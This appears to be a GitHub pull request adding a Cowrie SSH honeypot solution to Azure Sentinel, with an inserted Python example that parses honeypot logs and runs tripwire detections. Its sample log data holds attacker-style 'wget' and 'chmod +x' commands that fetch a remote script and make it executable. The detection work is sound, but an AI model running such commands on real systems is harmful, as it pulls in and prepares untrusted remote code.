Sensor SSH Cowrie solution #11155
Open
swiftsolves-msft wants to merge 33 commits into Azure:master from swiftsolves-msft:cowrie-nates
Conversation
As part of Hackathon 2024 a team developed a 1-click deploy solution that will deploy a Debian VM, install Cowrie, create an AMA DCR, DCE, and association, and create a custom table to collect Cowrie events. Solution contains a workbook (under development), 1 parser and 5 detection rules. The goal is to make this a framework for others and the community to create other 1-click deploys for other types of interactive honeypots. Can be used publicly for TI or privately as a detection tripwire.
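As an added illustration of what the parser and detection rules in a solution like this have to do (my own example, not code from this PR, from the Azure-Sentinel repo or from Cowrie), the block below parses Cowrie's JSON log lines into normalized columns and runs three tripwire-style detections over them. The input field names (eventid, src_ip, session, shasum, input, url) are Cowrie's own JSON output fields; the normalized column names are this example's choice, with Address for src_ip and FileHash plus an Algorithm column for shasum following the commit notes in this PR, and the sample log lines are constructed for the example, not captured from a real sensor.

```python
import json
from collections import Counter

# Constructed sample lines in Cowrie's JSON log format. The field names
# (eventid, src_ip, session, shasum, ...) are Cowrie's; the addresses,
# session ids, hash and timestamps are made up for this example. The hash
# is the SHA-256 of an empty file, used only as a placeholder value.
SAMPLE_LINES = [
    '{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":51022,'
    '"dst_ip":"10.0.0.4","dst_port":2222,"session":"a1b2c3d4e5f6","protocol":"ssh",'
    '"timestamp":"2024-09-20T10:00:01.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"123456",'
    '"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2024-09-20T10:00:03.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.login.failed","username":"admin","password":"admin",'
    '"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2024-09-20T10:00:04.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"password",'
    '"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2024-09-20T10:00:05.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.login.success","username":"root","password":"toor",'
    '"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2024-09-20T10:00:06.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.command.input","input":"wget http://198.51.100.9/x.sh",'
    '"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2024-09-20T10:00:09.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.session.file_download","url":"http://198.51.100.9/x.sh",'
    '"outfile":"var/lib/cowrie/downloads/e3b0c442","shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",'
    '"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2024-09-20T10:00:10.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.command.input","input":"chmod +x x.sh",'
    '"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2024-09-20T10:00:11.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.session.closed","duration":12.3,'
    '"src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","timestamp":"2024-09-20T10:00:13.000000Z","sensor":"honeypot-01"}',
    '{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry",'
    '"src_ip":"198.51.100.23","session":"0f0e0d0c0b0a","timestamp":"2024-09-20T10:02:00.000000Z","sensor":"honeypot-01"}',
    "2024-09-20T10:02:01Z not a json line: the parser must skip this",
]

# Cowrie JSON key -> normalized column. "Address" for the source IP follows the
# commit note above about using a Sentinel-recognized field name; the other
# column names are this example's own assumption, not the PR's table schema.
FIELD_MAP = {
    "timestamp": "TimeGenerated", "eventid": "EventId", "src_ip": "Address",
    "src_port": "SourcePort", "session": "SessionId", "sensor": "Sensor",
    "username": "Username", "password": "Password", "input": "CommandLine",
    "url": "Url", "shasum": "FileHash",
}


def parse_event(line):
    """Parse one Cowrie JSON line into normalized columns.
    Returns None for lines that are not a JSON object with an eventid."""
    try:
        raw = json.loads(line)
    except json.JSONDecodeError:
        return None
    if not isinstance(raw, dict) or "eventid" not in raw:
        return None
    event = {col: raw[key] for key, col in FIELD_MAP.items() if key in raw}
    if "FileHash" in event:
        # Cowrie's shasum is the SHA-256 of the captured file; carrying the
        # algorithm beside the hash lets a file-hash entity be built from both.
        event["Algorithm"] = "SHA256"
    return event


def parse_lines(lines):
    """Parser: every well-formed Cowrie event, in log order, noise dropped."""
    return [e for e in (parse_event(l) for l in lines) if e is not None]


def detect_successful_logins(events):
    """Tripwire: a successful login on a honeypot is suspicious by definition,
    since no legitimate user holds credentials for it."""
    return [(e["Address"], e["Username"], e["SessionId"])
            for e in events if e["EventId"] == "cowrie.login.success"]


def detect_file_downloads(events):
    """Payload capture: (Address, Url, FileHash, Algorithm) per download."""
    return [(e["Address"], e.get("Url"), e["FileHash"], e["Algorithm"])
            for e in events if e["EventId"] == "cowrie.session.file_download"]


def brute_force_sources(events, threshold=3):
    """Sources with at least `threshold` failed logins in the window."""
    counts = Counter(e["Address"] for e in events if e["EventId"] == "cowrie.login.failed")
    return {addr: n for addr, n in counts.items() if n >= threshold}


def sessions_with_commands(events):
    """Join command.input events to the successful login of the same session,
    so an analyst sees the credential pair together with what was typed."""
    logins = {e["SessionId"]: e["Username"]
              for e in events if e["EventId"] == "cowrie.login.success"}
    out = {}
    for e in events:
        if e["EventId"] == "cowrie.command.input" and e["SessionId"] in logins:
            out.setdefault((e["Address"], logins[e["SessionId"]]), []).append(e["CommandLine"])
    return out


if __name__ == "__main__":
    evs = parse_lines(SAMPLE_LINES)
    print(f"{len(evs)} events parsed, {len(SAMPLE_LINES) - len(evs)} line(s) skipped")
    print("logins:", detect_successful_logins(evs))
    print("downloads:", detect_file_downloads(evs))
    print("brute force:", brute_force_sources(evs))
    print("sessions:", sessions_with_commands(evs))
```

The parser tolerates non-JSON lines because a honeypot's log stream is attacker-controlled input and must not stall on junk; the detections then work only on normalized column names, so a change in Cowrie's raw field names is absorbed in FIELD_MAP rather than in every rule.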
fixing yaml spacing, initial validation tests failed.
added workbook and fixing parser yaml
fixed some KQL, data connector, and workbook validation errors; still researching why the permissions on the data connector do not match.
made a change to fix KQL validation by removing commas after each extend and putting | extend on a new line; also removed the txt-based parser.
added VM extension (AMA for Linux) in deployment.
fixing detections validation error: SourceIP custom column name changed to Sentinel-recognized field Address
minor fixes to validation errors
minor fix filehash
added algo identifier
created new kql validator for cowrie
added | extend for beginning of query line 25
updated deploy to azure button links and data connector permissions reqs
changes to data connector to pass kql validations
sreedharande previously approved these changes on Sep 26, 2024
create a custom sample data for Sensor SSH Cowrie solution.
Hi @swiftsolves-msft,
[like] Nathan Swift reacted to your message:
From: v-atulyadav
Sent: Thursday, November 7, 2024 7:12:15 AM
To: Azure/Azure-Sentinel
Cc: Nathan Swift; Mention
Subject: Re: [Azure/Azure-Sentinel] Sensor SSH Cowrie solution (PR #11155)
Hi @swiftsolves-msft,
We require a few modifications to the PR before proceeding with packaging.
1. The Name property of the data file is currently set to Cowrie, whereas it should be designated as Sensor SSH Cowrie.
2. It is also necessary to include workbook metadata in the WorkbooksMetadata.json file
(https://github.com/Azure/Azure-Sentinel/blob/master/Workbooks/WorkbooksMetadata.json)
change solution name to match and added workbook metadata in
update images for preview for workbook